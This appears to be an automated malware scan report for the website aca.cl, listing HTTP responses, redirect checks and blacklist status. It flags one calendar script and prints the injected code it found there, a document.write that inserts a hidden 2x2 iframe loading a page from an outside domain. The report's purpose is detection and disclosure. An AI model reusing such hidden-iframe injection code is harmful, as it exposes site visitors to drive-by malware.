Scanned pages/files
| Request | Server response | Status |
http://aca.cl/ | HTTP/1.1 302 Found Connection: close Date: Fri, 18 Jul 2014 07:48:30 GMT Location: sitio/index.php Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.4-14+deb7u5 | clean |
http://aca.cl/sitio/index.php | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 18 Jul 2014 07:48:31 GMT Pragma: no-cache Location: http://www.aca.cl/sitio/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6306l2hu5q01ua8bsrsnjv5dh3; path=/ X-Pingback: http://www.aca.cl/sitio/xmlrpc.php X-Powered-By: PHP/5.4.4-14+deb7u5 | clean |
http://www.aca.cl/sitio/ | 200 OK Content-Length: 24560 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4 | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://www.aca.cl/sitio/wp-content/plugins/photo-galleria/galleria.js?ver=3.0.3 | 200 OK Content-Length: 39325 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/js/jquery-cycle.js?ver=2.88 | 200 OK Content-Length: 16931 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/AJS.js?ver=5.54 | 200 OK Content-Length: 19831 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/AJS_fx.js?ver=5.54 | 200 OK Content-Length: 2877 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/gb_scripts.js?ver=5.54 | 200 OK Content-Length: 10866 Content-Type: application/javascript | clean |
http://aca.cl/../ | 400 Bad Request Content-Length: 298 Content-Type: text/html | clean |
http://aca.cl/test404page.js | 404 Not Found Content-Length: 284 Content-Type: text/html | clean |
http://aca.cl/solicitudes/cuerpo.php | 200 OK Content-Length: 9138 Content-Type: text/html | clean |
http://aca.cl/memoria/formulario_titulacion.html | 200 OK Content-Length: 8397 Content-Type: text/html | clean |
http://aca.cl/memoria/calendar/tcal.js | 200 OK Content-Length: 12188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zamf.html?j=2538958></iframe>');
var A_TCALCONF = { 'cssprefix' : 'tcal', 'months' : ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'], 'weekdays' : ['Su', 'Mo', 'Tu', 'We', 'Th', 'Fr', 'Sa'], 'longwdays' : ['Sunday', 'Monday', 'Tuesday', ' if (document.addEventListener) { window.addEventListener('load', f_func, false); } else if (window.attachEvent) { window.attachEvent('onload', f_func); } else { var f_onLoad = window.onload; if (typeof window.onload != 'function') { window.onload = f_func; } else { window.onload = function() { f_onLoad(); f_func(); } } } } f_tcalAddOnload (f_tcalInit); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zamf.html?j=2538958 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zamf.html?j=2538958> | ||
http://aca.cl/informes_practica/index.php | 200 OK Content-Length: 6281 Content-Type: text/html | clean |
http://aca.cl/informes_practica/descargas.php?f=Reglamento_general_practicas_ACA_r11_A.pdf | 200 OK Content-Length: 263081 Content-Type: application/octet-stream | clean |
http://aca.cl/informes_practica/descargas.php?f=InformacionPractica_2013-2014.pdf | 200 OK Content-Length: 300887 Content-Type: application/octet-stream | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aca.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 18 Jul 2014 07:48:30 GMT
Location: sitio/index.php
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u5
...0 bytes of data.
GET / HTTP/1.1
Host: aca.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 18 Jul 2014 07:48:30 GMT
Location: sitio/index.php
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u5
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aca.cl
Referer: http://www.google.com/search?q=aca.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aca.cl
Referer: http://www.google.com/search?q=aca.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aca.cl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aca.cl/
Result: aca.cl is not infected or malware details are not published yet.
Result: aca.cl is not infected or malware details are not published yet.